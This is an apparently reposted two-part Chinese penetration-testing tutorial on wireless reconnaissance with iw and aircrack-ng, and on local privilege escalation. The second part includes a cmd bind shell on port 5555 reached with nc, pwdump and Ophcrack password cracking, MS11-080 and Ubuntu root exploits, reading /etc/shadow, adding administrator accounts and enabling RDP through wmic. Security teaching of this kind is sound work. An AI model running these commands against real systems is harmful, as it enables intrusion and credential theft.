信息安全深透测试与工房无线网络中信息收集
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了信息安全深透测试与工房无线网络中信息收集相关的知识,希望对你有一定的参考价值。
我有很长一段时间没有来更新这个系列文章了,因为按之前的规划我写的内容被河蟹了,搞得我不知道该写啥。考虑了很长时间我觉得应该继续写一些东西,能发出来多少就算多少,可能有部分内容时间长了点,那也是没办法的事。这期开始我主要是想说关于无线网络的相关知识和信息安全方面:
1 无线的基础知识(2.4G和5G)
电气和电子工程师协会(IEEE,全称是Institute of Electrical and Electronics Engineers)是一个美国的电子技术与信息科学工程师的协会,是世界上最大的非营利性专业技术学会,其会员人数超过40万人,遍布160多个国家。IEEE致力于电气、电子、计算机工程和与科学有关的领域的开发和研究,在航空航天、信息技术、电力及消费性电子产品等领域 已制定了900多个行业标准,现已发展成为具有较大影响力的国际学术组织。国内已有北京、上海、西安、武汉、郑州等地的55所高校成立IEEE学生分会。
其中比较出名的是IEEE 802委员会,它成立于1980年2月,它的任务是制定局域网的国际标准,取得了显著的成绩。
802委员会有12个分委员会,他们研究的内容如下:
802.1 局域网概述,体系结构,网络管理和性能测量等;
——802.1d (生成树协议Spanning Tree)
——802.1p (General Registration Protocol)
——802.1q (虚拟局域网Virtual LANs:VLan)
——802.1w(快速生成树协议
——802.1s (多生成树协议MSTP)
——802.1x (基于端口的访问控制Port Based Network Access Control)
802.2 逻辑链路控制LLC;
802.3 总线网介质访问控制协议CSMA/CD及物理层技术规范;
——802.3u (快速以太网Fast Ethernet)
——802.3z (千兆以太网Gigabit Ethernet)
——802.3af(基于以太网供电POE:Power On Ethernet)
802.4 令牌环总线Token-Passing Bus (单一/多信道速率 1,5,10 MBit/s)网介质访问控制协议及其物理层技术规范;
802.5 令牌环Token-Passing Ring (基带速率 1,4,16 MBit/s) 网介质访问控制协议及其物理层技术规范;
802.6 城域网(Metropolitan Area Networks)MAC 介质访问控制协议DQDB及其物理层技术规范;
802.7 宽带技术咨询组,为其他分委员会提供宽带网络技术的建议;
802.8 光纤技术咨询组,为其他分委员会提供光纤网络技术的建议;
802.9 综合话音/数据的局域网(ⅣD LAN)介质访问控制协议及其物理层技术规范;
——802.9a (IsoENET (proposed))
802.10 局域网安全技术标准;
802.11 无线局域网的介质访问控制协议CSMA/CA及其物理层技术规范;
——802.11b11Mbps802.11b+ 是一个非正式的标准,称为增强型802.11b。802.11b+与802.11b完全兼容,只是采用了pbcc数据调制技术,所以能够实现高达22Mbps的传输速率。
——802.11g54Mbps是IEEE于2002年11月15日批准的一种实验性新标准。802.11g和802.11b一样也是工作在2.4Ghz频带,所以完全兼容802.11b,但是速度却比802.11b快5倍,能达到802.11a的水平。
802.12 100Mb/s高速以太网按需优先的介质访问控制协议100VG-AnyLAN(Voice Grade - Sprache geeignet)
802.14 (有线电视
802.15(无线个域网,WPAN)
802.15.4描述了低速率无线个人局域网的物理层和媒体接入控制协议。它属于IEEE 802.15工作组。
802.16(无线城域网,WMAN)
802.17 (弹性分组环
IEEE 802 委员会最先出台的标准是802.1~802.6,这6个标准已被ISO采纳为国际标准,包含在ISO 8802-1~8802-6等文件中。美国国家标准协会(ANSI)把IEEE 802标准作为美国国家标准。
工作在2.4GHz,采用直序扩频(DSSS)
5 GHz国内的话149、153、157、161、165这5个都可以。其中可支持一组80MHz信道捆绑(149-161)或两组40MHz捆绑(149-153和157-161);所以165信道支持20MHz频宽。
若支持11ac;则还有5.2G的可用信道:36、40、44、48、52、56、60、64;由于国家使用雷达环境中会与52、56、60、64信道冲突,因此常规模式下建议避开这些雷达信道,以免出现无线终端接入问题。低信道可用36、40、44、48这四个信道。
2 无线局域网信息收集
1、Service Set Identifier (SSID)
• AP每秒钟约10次通过Beacom帧广播SSID
• 客户端连接到无线网络后也会宣告SSID
2、dmesg -T #查看系统设备的变化(在Kali系统下使用)
3、iwconfig #查看无线网卡信息
4、iw list #查看详细无线网卡信息,是否支持AP\\monitor模式
5、iwlist wlan0 frequency #查看网卡支持的信道
6、ifconfig wlan0 up #首先开启无线网卡。iw dev wlan0 scan #扫描附近的无线AP的SSID。signal: -72.00 dBm #负的dBm表示是接收的信号强度。越接收零信息越好。也可使用grep来过滤你想看的内容。
7、iw dev wlan0 interface add wlan0mon type monitor #把无线网卡改成monitor模式
8、ifconfig wlan0mon up #开启wlan0mon网卡
使用wireshark可以监控wlan0mon网卡的无线数据包了
l Iw dev wlan0mon interface del #不需要时,删除wlan0mon接口
l 无线数据包的RADIOTAP头部
3 AIRCRACK-NG 套件工具
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK嗅探。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
l airmon-ng #查看无线网卡信息
l airmon-ng check #检查是否有相关进程有冲突。+kill #杀死进程
l airmon-ng start wlan0 #转入monitor mode
l iwlist wlan0mon channel #查看处于哪个信道(Channel 10)
airmon-ng start wlan0 6 #修改网卡工作的信道
l airmon-ng stop wlan0mon #结束monitor mode
l airodump-ng wlan0mon #对无线网卡进行侦听
airodump-ng wlan0mon -c 1 #对无线网卡进行侦听,只1信道
l airodump wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap #只侦听某个AP的数据包,并保存到file.cap文件
l wireshark waln0.cap-01.cap #使用wireshark打开保存的文件,查看信息
l 修改网卡的临时MAC地址
aireplay-ng -9 wlan0mon #检测网卡是否可以注入包
l aireplay-ng -9 -e Tuxiaolan-2.4G -a 50:FA:84:79:EB:B6 wlan0mon #指定AP和MAC去检测网卡是否可以注入包,出现下面问题时可以去修改信道(参考前面)
这期内容我就写这么多吧,如果能写下去,后面再更新吧。
信息安全深透测试与工房操作系统本地提权
在上一期里我们讲述了怎样公鸡操作系统,那么在取得了操作系统shell的控制权后,可以进行系统提权的操作。
- windows系统下的账号提权:
查看账号的详细信息
使用AT命令去指定一个时间调度命令,at 19:39 /interactive cmd。执行后就可以从administrator账号提权到 system账号。
使用SC命令,创建一个服务命令,去重新启用一个新的窗口,类型为交互。sc Create syscmd binPath= "cmd /K start" type= own type= interact
sc start syscmd
也可以使用第三方程序pinjector.exe(进程注入),翻墙才能下载。
下载地址:http://www.tarasco.org/security/Process_Injector/
注入到PID656这个进程,用CMD这个程序,如果有人连入5555端口
现在5555端口已经打开
在核客端执行NC命令去连接对方的5555端口就可以使用CMD操作了
- 本地缓存密码提取
在浏览器里输入账号和密码后,根据提示会在浏览器里保存下来,不管是linux还是windows系统。
系统浏览器中有设置缓存的地方:
可以看到管理密码的选项:
系统中有密码管理器:
介绍windows密码恢复和查看工具,下载网站http://www.nirsoft.net/
Windows密码恢复工具:
Kali中提取linux下的windows密码工具pwdump,可烤备到windows使用:
打开软件检查本地主机文件
可以看到对应账户和密码,不过都是密文:
把它们保存为记事本文件:
拷备到kali中:
使用cat查看该文件:
使用Ophcrack解密软件对该文件里的内容进行解密:
- 利用漏洞提权
在kali下查看Microsoft 软件中的安全漏洞。网页中查找
• https://technet.microsoft.com/library/security/ms11-080
把.py烤备出来,查看一下里面的内容,可以烤到windows系统里去使用python程序去执行这个文件,不过中文版的windows无法看到提权效果,除非你会修改这个脚本要它适合中文版使用。
在英文版系统下使用效果:
Linux下的Ubuntu11.10 操作系统有个漏洞可以利用,可以先从下面的网址去查看漏洞http://old-releases.ubuntu.com/releases/11.10/
在这个版本下安装gcc软件,需要使用Ubuntu11.10的安装光盘做yum源才能使用下面的命令的安装gcc。sudo apt-cdrom add && sudo apt-get install gcc
利用gcc 18411.c -o exp,使普通账号能获得root权限。从kali中烤备到目标系统中
利用gcc生成exp文件
然后给exp文件以执行权限
直接执行此命令
此漏洞的博客地址:http://blog.zx2c4.com/749
在取得客户端的shell权限后,可以收集相关信息:
Linux系统下收集信息方法:
• /etc/resolv.conf #DNS配置
• /etc/passwd #用户账号
• /etc/shadow #用户密码
• whoami and who –a #查看当前账号,有谁登陆
• ifconfig -a, iptables -L -n, netstat –r #查看IP地址,防火墙设置,系统网关和路由
• uname –a, ps aux #查看系统版本,是否有漏洞或安装补丁。进程PID
• dpkg -l| head # 当前系统所有的安装包
Windows 系统下收集信息方法:
• ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r #IP地址配置参数,查看DNS缓存,查看路由网关
• net view , net view /domain #查网络共享,域共享
• net user /domain, net user %username% /domain #查看域账号
• net accounts, net share #查看当前机器开了哪些共享
• net localgroup administrators username /add #把账号加到管理员组的命令
• net group "Domain Controllers" /domain #域环境下查看组里的域账号
• net share name$=C:\\ /unlimited #权限允许情况下开一个共享
• net user username /active:yes /domain #域环境下启用一个锁定的账号,要有域管理员账号才行。
WMIC(WINDOWS MANAGEMENT INSTRUMENTATION):windows管理框架
• wmic nicconfig get ipaddress,macaddress #查看底层硬件信息,比如IP、MAC地址
• wmic computersystemget username #查看计算机账号
• wmic netlogin get name,lastlogon #查看用户通过网络登陆信息
• wmic process get caption, executablepath,commandline #查看当前系统进程或命令
• wmic process where name=“calc.exe" call terminate #可以结束一个进程
• wmic os get name,servicepackmajorversion #提取操作系统的版本及补丁
• wmic product get name,version #查看当前系统安装了哪些软件
• wmic product where name=“name” call uninstall /nointeractive #可以卸载某个软件
• wmic share get /ALL #查看共享文件夹
• wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections"1“ #开启远程桌面
• wmic nteventlogget path,filename, writeable #查看当前日志的名字和存放路径
这期也讲述的内容不少了,也是因为前期时间一直没有更新,这次补上吧。下次我们来讲讲无线这块的内容。
以上是关于信息安全深透测试与工房无线网络中信息收集的主要内容,如果未能解决你的问题,请参考以下文章